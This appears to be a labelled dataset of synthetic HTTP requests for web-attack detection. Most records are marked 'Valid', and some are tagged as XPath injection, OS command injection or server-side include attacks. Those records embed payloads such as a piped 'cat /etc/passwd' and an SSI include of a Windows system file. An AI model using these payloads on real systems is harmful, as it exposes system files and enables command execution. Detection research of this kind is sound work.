If-Modified-Since: Fri, 20 Jun 08 08:26:55 UTC
If-Unmodified-Since: Thu, 01 Jan 09 01:35:48 GMT
If-Match: ".GSQS.ZwWheTSUDj"
If-Range: Thu, 18 Dec 08 22:10:22 GMT
Max-Forwards: 6
MIME-Version: 9.4
Pragma: e=sl
Proxy-Authorization: E0mqn 5bih=ea6O4
Authorization: Basic cmFhaXQ6bkVpam10
Referer: /areuw/RcoaE.pdf
TE: trailers,trailers,deflate;q=0.9
User-Agent: Mozilla/3.1 (compatible; udhW; Win98; hztryeeThe; gVeqeMero; Lsgo)
UA-CPU: MIPS
UA-Pixels: 0599x418
Via: 0.4 18.127.56.254, dlsno/5.3 www.ltXep.html, 1.9 7.183.19.199
Transfer-Encoding: compress
Warning: 938 www.ezbot.js:68616 "saekynale3effusp" 
X-Forwarded-For: 3.77.163.149
----: -----------------------------------------

null

End - Id: 46433
Start - Id: 3019
class: Valid
GET /2eiy8tkmonaRycstoh3.asmx?cn=o&tsadd9Ot5ss8=3431461671&wenyalbdbeshon=5385588&sdsntagteDu=ol%3Dht%2Fs&a2=21&Bfstcneeeybrs6l=sbt2e&s797aa4rxtwa2s=027492&Ldwtrhs=es%7EielibEmrer&wyflhc2wri=iranoxecd&6etao4dtta=KtjezkiR HTTP/1.1
Host: www.9hciria8ve.com:3754
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.7, x-mac-icelandic, iso-8859-15;q=0.2
Accept-Encoding: gzip;q=0.4, identity;q=0.8, gzip;q=0.1, gzip;q=0.3, deflate;q=0.1
Accept-Language: srohasei-eTawc;q=0.5, aiS-n;q=0.3, O60s-oscnois, nt2lni-ta;q=0.9
Cache-Control: min-fresh=04708
Client-ip: 109.15.123.3
Cookie: a0et59=isen;hlfomdseboexrne=ERyne;laeoyhA=spe-
Cookie2: $Version="951"
Date: Fri, 16 Apr 04 07:18:57 UTC
ETag: "qUHkNbL-yPO3IxUA"
Expect: euetit
From: Gnrp@qqtreOp.fr
If-Modified-Since: Thu, 07 Sep 06 19:29:21 UTC
If-Unmodified-Since: Tue, 29 Apr 08 14:04:57 CET
If-Match: *
If-None-Match: "8Ej4Lil.fKbwYntyd"
If-Range: *
Max-Forwards: 07
MIME-Version: 1.8
Pragma: 0=teiho0mo
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: Digest response="cC0E4CfA8aaF4Fc841F0f2aF9bceb86d"
Range: 893626-,911123-5
Referer: http://zseptH.ch/1astyr.php3
TE: trailers,trailers,gzip
Trailer: Warning
User-Agent: Mozilla/0.3 (X11; U; Solaris 0.8; ia-rs; rv:6.2.7) Gecko/63097499
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 918x116
Via: 6.0 155.176.209.163, HTTP/2.8 www.tduaeo.tiff, 6.2 www.xw8enR.jpeg
Transfer-Encoding: identity
Upgrade: nenfhq/1.5, aiea/9.0, 8nTSn/3.7, sddt9/6.1
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 32933233721
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3019
Start - Id: 1675
class: Valid
GET /eryrzdyeskam/nofoesNhanNrcrimer/sl8xpvQyBFab2JLW_F/pqjJovMZ7ejl/lLyA0._FzssFfO4/e3tG6fz-SMQM.php4? HTTP/1.1
Host: www.L5stkce.ch
Connection: eba1yi
Accept: */*;q=0.5
Accept-Charset: koi8;q=0.8, cp-932, x-mac-arabic, windows-1254;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 77.199.112.25
Cookie: te=&Rh;eq3adhZnteo=75;adlLiDo=87;bsjnteo=495;solrrz=322745;jztje=ohttpashutdownsiselecthnscript
Cookie2: $Version="3"
Date: Mon, 02 Jun 08 12:01:29 UTC
ETag: W/"MReuzw08_R6LGpb4M"
Expect: 100-continue
From: pb3eit@susdyhwa7.com
If-Modified-Since: Sun, 09 Dec 07 23:01:28 UTC
If-Unmodified-Since: Mon, 14 Sep 09 18:02:17 UTC
If-Match: *
If-None-Match: *
If-Range: "AO7MjyIr0-mRR@rq0QP"
Max-Forwards: 404
MIME-Version: 8.4
Pragma: t='k8AsLntT'
Proxy-Authorization: NTLM ZGROVHV0cHRHZTJjc285QWt1YWRIdGVPbkUxaGhlZHQ1aXN0bHZ0YXNhRQ==
Authorization: NTLM bmVIMU5pZThzZnVsbnRhaW53c2t5Y3M2ZG9lb3N0RnR2cGk=
Range: 73-
Referer: http://www.aoaosrT.de/ttCt/inh3ooen/i0dte/i6cldt.mpeg
TE: gzip;q=0.2,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: ssdqdaTwD3 (nfv7ljf.; nbC_RTg; dMGj@mu; iQpWvVMA; vpFeMd)
UA-CPU: PowerPC
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: compress
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 918 www.oDrh8eht.gif:495 "6reee4ateqt1g" "Tue, 13 Dec 05 16:36:28 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1675
Start - Id: 5508
class: Valid
POST /razI7ea1LnaornCw5.jpeg? HTTP/1.1
Content-Length: 103
Content-Language: arr,uxef
Content-Encoding: identity
Content-Location: /vtftHa8s/orql.rar
Content-MD5: dVdFc25xaG9jaW10YWE1cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Aug 05 21:15:32 CET
Last-Modified: Tue, 26 Feb 08 06:09:31 GMT
Host: www.qElIagUete.it
Connection: shrao0Ia
Accept: video/*, image/gif;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.4, gzip, identity;q=0.4
Accept-Language: trrn-e, efN-tasst, yt-t;q=0.8, oi-oa9;q=0.3, ehr-a;q=0.0
Cache-Control: no-cache
Client-ip: 158.89.14.102
Cookie: j4aujCftahkesu=rp96;5mwenr9ektuedl=aeioahhlMzeEtylLnc;ennendsss8n=58737054
Cookie2: $Version="30"
Date: Sun, 01 Apr 07 17:47:49 CET
ETag: W/"ClRNYgOpJa7vxzd"
Expect: tecg4e=niarorrd
From: RlTg@lDaee.org
If-Modified-Since: Thu, 15 May 08 07:11:31 CET
If-Unmodified-Since: Fri, 10 Aug 07 17:00:03 UTC
If-Match: "2EQ0WCyjZ@4aCj@P7"
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: Sun, 14 Nov 04 23:57:21 GMT
Max-Forwards: 01
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic RXR3d2dpd3c6dzZnZXB4ag==
Authorization: td2os rysi0=u5itgadb
Range: 4-,7992-3492,625-
Referer: /ccfoOc/onOho/tlaeha.pl
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.7 (X11; U; Open BSD i586 8.5; bl-yS; rv:0.1.1) Gecko/90314796
UA-CPU: 68000
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9236x3191
Via: rocere/8.7 www.whmb0.css, HTTP/4.9 www.eeaAop.htm
Transfer-Encoding: gzip
Upgrade: ttd44a/8.9, eme6te/3.4, sge/5.8, 8mn/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 926841
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5tr6vssc=iGc&8ntsiM=aHTNNbF2NqD&aBV95EleOsos=e8@8rsmeta8>&d6M=oies&lna7o=eDP@5wRsJyJM&a6ouf=etaac

End - Id: 5508
Start - Id: 26876
class: Valid
GET /joaunrmnelfsljven/QLh/oittrethetolr.php?eenesaameaewd=olFeUShnSerl&xVugKHhiK=%7C&oltpaee=selikeceetmphaving&Socrtg4d6r=21&hi4uEifnao0due5=e-e&oshtdth=yeetdl&gwUcNDI7swinnt=l5yI47m&hebtmeaiaeie=h9eioo6&re5Jmhesmg=ntvcyeQ&mTc=o HTTP/1.1
Host: 23.121.49.203
Connection: adh1tUs
Accept: application/*, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 165.249.81.191
Cookie: AobotQaotkooc=1-ca;vDBnetcat=660352;WBnph-e=ex3@?w >betweenbetween1roadminnotr;rocehtb=: imgphp +;dauk9f=l;cstdyclctoeuqt3=7RfdMdjARVoC
Cookie2: $Version="80"
Date: Sun, 11 Dec 05 04:25:54 CET
ETag: W/"ckZDA9mDdPCDqj@pJwrG"
Expect: 100-continue
From: eaaum3ie@Tern.net
If-Modified-Since: Wed, 21 Oct 09 03:00:48 GMT
If-Unmodified-Since: Mon, 27 Aug 07 08:59:14 UTC
If-Match: *
If-None-Match: "TfkQUkgau4VJatv5_o52"
If-Range: "zGumFhDIk5qzfBoIO"
Max-Forwards: 6350
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic YWlhZ2ZBcjo1bXJldQ==
Authorization: mo8i Yijwe=shmq
Range: 2669-620
Referer: http://www.I8Bcrt.be/Ittd7t/efe8C6is.msf
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/5.4 (compatible; oPrd2n; Solaris; alD2oj; bkeo; alihghats)
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9814x1840
Via: 2.9 www.iefioia.tiff, 3.5 www.lssqhcn.jpg
Transfer-Encoding: deflate
Upgrade: leh/4.9, tsgto/9.5
Warning: 859 87.196.54.182 "s9ptiys" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26876
Start - Id: 34993
class: Valid
PUT /n8NkpTCI9/cStairnatnhit9echtne/hPuRg.htm? HTTP/1.0
Content-Length: 173
Content-Language: tf,we,5cda
Content-Encoding: deflate
Content-Location: http://emon1c.cz/rrzlr/etntdnfl/iApneg.mpeg
Content-MD5: b2NkdG5laXNodG9NYnJlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Jan 07 19:55:50 UTC
Last-Modified: Mon, 25 Jun 07 03:46:24 CET
Host: www.joeptd.net:80
Connection: close
Accept: application/x-tar;q=0.0, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: rfztlorG-tcnNdn, fe-ck, bntuoq-latz;q=0.3
Cache-Control: no-transform
Client-ip: 255.203.89.64
Cookie: wsciop=yPCqg60ADCv;8qtxemtb=69955;tesgohaen=mietfromrrry)eh;httpxgroup byE=0435;TRRd=317
Cookie2: $Version="3"
Date: Mon, 19 Nov 07 13:15:58 GMT
Expect: diwlDeta=e2kem
If-Modified-Since: Thu, 06 May 04 17:03:22 GMT
If-Unmodified-Since: Fri, 24 Mar 06 23:44:06 GMT
If-Match: "-L0g3L1YD2mgeD5-"
If-None-Match: "4kX4VAbfCdSrT9sJNDV"
If-Range: *
Max-Forwards: 871
Pragma: tr=zo2
Referer: /tch8he/rsswEeee/morwenLu.jsp
TE: chunked;q=0.0,gzip,trailers
User-Agent: rdsneta8o2/9.9.8.8.5
UA-OS: Win9x
UA-Pixels: 3778x0485
Via: 3.9 www.3oswehd9.html, HTTP/7.9 www.e9ae2e.htm, HTTP/6.0 248.132.233.211
X-Forwarded-For: 151.22.66.165
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

5eSE=oe&poedtg2ywjarl=9170&Hsc4ct5hed=7556225&rwte9s= <&m2bO=35843&wgYeIesEnie=ntatsneei8LEdlnesu&7tnsAOzSirpvu=y(/ia&ea7dgiBd=djauinnnxsdda4c&Mp7dj7L2w.Nservices=0576

End - Id: 34993
Start - Id: 33483
class: Valid
PUT /rh_lR0XCgwzBanZ84/DymKupdate08UzrQ4sV/.k89/o8s_uerT/Y8t0jesesyd6ef/raGekUBk4_CK-Tw/ap@4izol/oefoAqroes/ucmeci3rKvlCsah.jpeg? HTTP/1.1
Content-Length: 216
Content-Language: tq8nne,O2otiu,um
Content-Encoding: gzip
Content-Location: http://A2si2hvi.it/difif.asp
Content-MD5: QW9mMGFpanJuZXJXOHR0NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 19:32:24 CET
Last-Modified: Thu, 29 Oct 09 17:31:03 UTC
Host: www.rtym.biz:4744
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 223.229.235.206
Cookie: forwwwh0i=witdhmaa;rohcyrq=e6Q_PI.0k;9YO0q1script=mdOyadrb4uln;OdeIioonncl8=iWsRZbo8t
Cookie2: $Version="81"
Date: Thu, 20 Nov 08 22:16:54 CET
ETag: "N@YIkvlv7W2brt-"
Expect: 100-continue
From: wdp08E@ecUow0letw.uk
If-Modified-Since: Sat, 08 Mar 08 19:46:42 UTC
If-Unmodified-Since: Fri, 24 Apr 09 15:21:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5710
MIME-Version: 6.6
Pragma: 0nofmsy='te'
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: 5wk0o Lnevsdr=tooor
Range: -284
Referer: http://www.Lpdte2.fr/j6ht32.asp
TE: trailers,chunked
Trailer: Range
User-Agent: QsteetxtountgaoadE
UA-CPU: MIPS
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: HTTP/4.4 60.78.251.192:3
Transfer-Encoding: compress
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 159.146.237.86
X-Serial-Number: 179106
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aigAmE5wwmn9=0224&eK=E&eOHnrjo2=8&s6=52&EoansNp4km=vJs&hRNzpieyAL=75104147&XcNmq.Hi=tinii&kTj7uPcautoexecLexecz=2&XHLshutdownh.Q0afncZi=98&ssyNwyt=5311&jcfruGng9c1tocd=dn@Oykms&j8idenaeae4oh=saR&tpy=euta=dda:gu

End - Id: 33483
Start - Id: 48827
class: XPathInjection
GET /e-m6/ate3ress0m/Eyaiii2twrxw7l/dPYFwI/window.opencatjyMsystem5@/opaztz0/fIdZ5OFT6uudjBa7AbI/_4NVaWDmailXj3g2J8/prutnnlee.nsf?gAk6q2DoZo=%28i+%3C+++++count%28ni%2Fchild%3A%3Atext%28%29%29+++++and+++j+++++%3C+count%28ha6T%2Fchild%3A%3Acomment%28%29%29++and+++k++++%3C++count%285nTdd%2Fchild%3A%3A*%29+++%29&JoruQorJkZ16=fneu5 HTTP/1.1
Host: www.9aewsi96.fr:13
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-2;q=0.8, euc-jp;q=0.5
Accept-Encoding: 
Accept-Language: iESckhdt-tnria, 4uus-stRl9f, t-q
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: elzdbakei=096;YWlinkWuF8g.ws=dxtermvoasystemerTkea =o
Cookie2: $Version="352"
Date: Mon, 26 Dec 05 06:11:50 UTC
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 23 Jun 04 15:46:13 CET
If-Unmodified-Since: Thu, 17 Aug 06 05:39:55 CET
If-Match: "_6M@gVGFznOp5AxDMQ"
If-None-Match: "LVPxUCcOsqz.AInwqgl"
If-Range: *
Max-Forwards: 5874
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: Digest qop=auth-int
Range: 5920-3
Referer: /a5relril/nssy.bin
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 5.9; si-a6; rv:6.0.2) Gecko/71532097
UA-CPU: StrongARM
UA-Disp: 8370,749,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 5.8 140.74.219.98, 4.6 www.tsniwcz.shtml
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 888 57.174.35.186 "l3aT4eMc1oeMeeesb" 
X-Forwarded-For: 195.79.63.112
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48827
Start - Id: 34967
class: Valid
POST /aq7gfnraGnqsgw/znh2gnwodhliid/3DZR@QJ7fNVdVoZ_0/htpassjAe3PhuniondD/euTt7naoclo8Obopkh/slolufxso/s-a_o@9/pQCxCAVhKS9ooK/mh0UVHQwrbqB7S.sh? HTTP/1.0
Content-Length: 104
Content-Language: swtt,rjz,0oPp
Content-Encoding: deflate
Content-Location: /hNneAaq.shtml
Content-MD5: bWUzU0VuaVVzbm9pamVvMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 03:34:18 CET
Last-Modified: Tue, 08 Jan 08 06:21:46 CET
Host: www.r2Gi0q.ch:80
Connection: close
Accept: image/*;q=0.8, text/plain;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: gzip;q=0.8, identity;q=0.5
Accept-Language: 9doa-nrq, 9-yliu;q=0.3, aa07b-ahsCr;q=0.1, E4nt-eih;q=0.3
Cache-Control: min-fresh=0
Client-ip: 210.178.89.60
Cookie: 58veif=24484432;Enl=3\;objectVN1PvA07w=nzu_;jt2we5vhet=080305;9jllgioity0ae=annvteo
Cookie2: $Version="2"
Date: Mon, 17 Nov 08 16:52:55 UTC
ETag: "INuV8pKCEwWu6gA8wE"
Expect: rrwee4e=pisr;tse6na
From: Jfon@lR0e.de
If-Modified-Since: Thu, 05 Oct 06 13:40:16 GMT
If-Unmodified-Since: Tue, 30 Jan 07 03:53:46 GMT
If-Match: "uXBt0X1Dc-qd-O0tmPU"
If-None-Match: *
If-Range: "HuBi3qEhrVaLIMNhnAbn"
Max-Forwards: 04
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: eeOh Dfzs=6a9tnHr
Authorization: Basic cklrczhhZGQ6ZWE1R3I2ZHM=
Range: 364064-7831,-653,14-
Referer: http://naeeBh6i.biz/nPadto.doc
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 7.4; 3a-ls; rv:3.0.0) Gecko/94764244
UA-CPU: StrongARM
UA-Disp: 4391,758,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1780x097
Via: 8.3 www.yonsirfa.jpeg, 4.6 www.nfonj.shtml
Transfer-Encoding: deflate
Upgrade: hebtsm/1.8
Warning: 360 62.80.65.21 "urvcnetdenma" "Tue, 25 Sep 07 21:36:03 CET"
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 755245432377424
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

U5scriptVMetclyZG=87909696&3tivnuedipsortw=sgc&nyhrgn=dbodyolhttpserddef i&tahorbtaiTosnto=dcxse1Eriehot

End - Id: 34967
Start - Id: 36722
class: OsCommanding
GET /r0hecTadrOka/eep/tQwD_/i9_YDYeiLZEeMEl.@wX/mJMqH3coM.png?gse=69860&rPsuc=gpdoapueerw&4n7eehNalE=e7r0emt&he=7lnchmmnaudc&0t3N=%7C+++++cat++%2Fetc%2Fpasswd&9xexecIWGopt0Mr@=316&j@xI8-PQXlt=t-catn%2F2tucnh HTTP/1.0
Host: www.syel.st:80
Connection: v1dXRF
Accept: */*
Accept-Charset: euc-jp;q=0.7, us-ascii, iso-8859-8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=21814
Client-ip: 234.49.182.184
Cookie: oiseeIod9=ptoe n4l@ATe7tolr;tge2tt2eioooce=h replace'>;eu3aaAteoe=mAhttpsO;s1ecGxre8xs=29544023;sE2ocdeqirUNol=27118;faamgnbwelre=0815
Cookie2: $Version="34"
Date: Wed, 04 Jun 08 03:49:35 GMT
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Wed, 14 Feb 07 01:05:49 UTC
If-Unmodified-Since: Tue, 20 Sep 05 18:09:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/r38t/bngs5.css
Range: 36-238879
Referer: /Drrtus/aOgouie/lhAd6ea/foer/toSseays.php4
TE: trailers
Trailer: Cache-Control
User-Agent: tieysnfel (lkm10O; j2t7Yvc)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/5.0 196.208.230.20
Transfer-Encoding: iai5; 7htdt43t=hees
X-Forwarded-For: 18.24.168.27
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36722
Start - Id: 1392
class: Valid
GET /0ehrcbteee4ixyir/siUahorRtdaslcisnnp/od5/odNk5U@IEqrwn7a5_wM_/iivECfxXZVK9Su4gBihF/twutou4ch.html?3Woinfthoje=41036&LM9dqQ=J6ecvhomeluoob&yeodteCT=dPdkDSQwj&rqryxmTeuE=owd.yn6&r6xx=70262659&asw=eo%3F&5ie=tdq0 HTTP/1.1
Host: 38.135.155.87
Connection: ohynr
Accept: image/*, application/*
Accept-Charset: windows-1258, shift_jis;q=0.5
Accept-Encoding: gzip;q=0.5, deflate
Accept-Language: naAh-iwtBtme
Cache-Control: no-transform
Client-ip: 66.221.67.104
Cookie: rtosse=eso|anaH;e3rl=rSj27einte2;eoc8id=edeifbbTnnsweSa;ngO=oU@4BGz8cXuE
Cookie2: $Version="539"
Date: Thu, 25 Nov 04 01:48:09 CET
ETag: "yLF_9eVimBS7ymwy1hq"
Expect: 100-continue
From: 4a8k@ilaedTEuh.net
If-Modified-Since: Sat, 13 Jan 07 17:09:17 CET
If-Unmodified-Since: Mon, 26 Dec 05 11:14:50 CET
If-Match: "8Kl1KroT7kAnI_Da"
If-None-Match: "hbO@22X0MAjhgceN0"
If-Range: *
Max-Forwards: 11
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: peo1 et1n=eacseu
Authorization: Digest nonce
Range: 373155-704,-1740,72564-298
Referer: /aj7t.php3
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 4.7; y1-zx; rv:7.2.5) Gecko/95581145
UA-CPU: x86
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 238x900
Via: HTTP/7.2 221.28.60.50:129, 2.8 179.46.45.67, 4.9 www.iadasuet.jpeg
Transfer-Encoding: compress
Upgrade: bhgp/1.7
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1392
Start - Id: 40532
class: SSI
GET /3YmnRzGEMhfeJJZ902/cmharwOelis2nhey/iXW/cxBW1w@UFOSdL/oQkl9_1.js?etwo1bma9sd=214202845&Mo=sr3sl2n&dtiibmieadawf=7&cewlsoo0n=z+oc&rEfe=passthrutme%25&E2Rheafcocitu=%3C%21--+++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&s3=lpzjLX6UZ&HpIytwnGtcstaio=i%5D%7Es%5Bt HTTP/1.1
Host: 103.118.28.43
Connection: keep-alive
Accept: text/*;q=0.0, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 233.63.57.74
Cookie: o7iS=iomah7otmttEjuTe;TEosgcox=eta1sdediliYbiahp
Cookie2: $Version="326"
Date: Thu, 30 Mar 06 13:02:03 GMT
ETag: "AfcdCSnakAcyeEBs"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Fri, 01 Aug 08 19:37:58 UTC
If-Unmodified-Since: Thu, 06 Aug 09 24:01:04 GMT
If-Match: "qV-cYVjAGKbV-yPpeMju"
If-None-Match: *
If-Range: Sat, 16 Jun 07 06:14:22 UTC
Max-Forwards: 77
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: Basic aWJaZTpzc25o
Range: -52,238-2637
Referer: http://www.pouy2t4e.be/srita.conf
TE: trailers
Trailer: Referer
User-Agent: Sbaaelo
UA-CPU: MIPS
UA-Disp: 5153,3619,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: FTP/3.2 www.entebte9.jpg:779
Transfer-Encoding: deflate
Upgrade: 26c/9.8
Warning: 706 www.8omhtse.shtml "seeiifggsn7jjfoai" "Fri, 07 Dec 07 06:30:57 GMT"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40532
Start - Id: 31687
class: Valid
GET /pKisBEjho0/thsa7ff/gOgAKNfA_/slerBm1ctt/satdtrse0nrtnhoncil/rr.jsp?icdiiiwhs2tnr5b=heefwftwdi9ifit&uNharetf9atxt=%29rEnph-+ost&re7slAthht=i5otapsi&iwms3udtyAe=4_W&x7am9c=1rs7snrw&uC288MF=o81esgfriepwa&elsrdknrn=dcnnnn&5hebt=harigLcrnwniette&aiuo=n1Dpm&mae=1433513352&uvod7n=dkNH0nlrdq HTTP/1.1
Host: www.o2l0llsoym.be
Connection: hi2lea
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=58488
Client-ip: 111.189.10.81
Cookie: ooehtndbbit1e=scripty;ydeetsiLasrnoc=rHqgu;heFstr1H=5472
Cookie2: $Version="957"
Date: Sat, 07 Feb 09 20:59:16 CET
ETag: "M_Afn_Zw5X6eeJU"
Expect: 100-continue
From: ohtet@rtesnrmn.st
If-Modified-Since: Mon, 19 Apr 04 20:02:23 GMT
If-Unmodified-Since: Sun, 27 Apr 08 23:24:47 UTC
If-Match: *
If-None-Match: "4CaxTGt_7i.CnaGe"
If-Range: Tue, 18 Sep 07 14:25:04 UTC
Max-Forwards: 6
MIME-Version: 6.2
Pragma: aernB1si=Tte
Proxy-Authorization: Basic T3RleHR0OmFMYWduNQ==
Authorization: rnil8 e5aeude=ooauaoej
Range: -809966
Referer: /asnf.wav
TE: chunked;q=0.7,deflate,deflate
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 2.9; sw-tw; rv:2.4.2) Gecko/54400295
UA-CPU: PowerPC
UA-Disp: 1473,257,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9430x7643
Via: 8.4 39.231.252.0
Transfer-Encoding: deflate
Upgrade: tfe/3.9, hj1i/0.9, nnddms/3.6
Warning: 142 www.tu3lson.jpeg "aawhzg1iigNnOjIffc2R" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 90134237521191583
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31687
Start - Id: 29268
class: Valid
GET /hcurS1.G@dC/betweenWI./i.cBlcN0gS-rYMuuNsaK/e5i/urttehsnt1asrs/bXoZIFi/nshPc.pl? HTTP/1.0
Host: www.aEencmht.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: anle-e, es-aroGld, lahiits4-rIlahln, oji-0e;q=0.4, serEom-8lxm8;q=0.0
Cache-Control: mia=ad0ip
Client-ip: 220.42.135.249
Cookie: 9mle=ahpr?(ly;os7msnugR=53055039
Cookie2: $Version="5"
Date: Tue, 21 Jun 05 17:17:25 GMT
ETag: W/"PBQsQmQZlKxLVko"
Expect: Stu6fO
From: wLSbh@frcenoy.it
If-Modified-Since: Sat, 02 Oct 04 09:08:38 UTC
If-Unmodified-Since: Wed, 18 Jul 07 07:29:34 CET
If-Match: *
If-None-Match: "mg04gBrPd6Iw1dn-fEo0"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.5
Pragma: ectn=tue
Proxy-Authorization: NTLM ZUkxZXlvcnNhbjhhcmVpYTNsbGhhMWZsb3NodjVmZjRyYXY3
Authorization: Digest response="1b2DB27CCF9dE6E6F44d8e6a8EEDF329"
Range: 222382-446,006519-77,90-10
Referer: http://www.wslsoc.org/689tcr7/tgke/5srt.tar
TE: gzip;q=0.5,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 8.0; ty-at; rv:2.2.8) Gecko/93325126
UA-CPU: PowerPC
UA-Disp: 3936,3776,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: res/0.8 www.RTeT.css, 1.8 255.198.118.154
Transfer-Encoding: identity
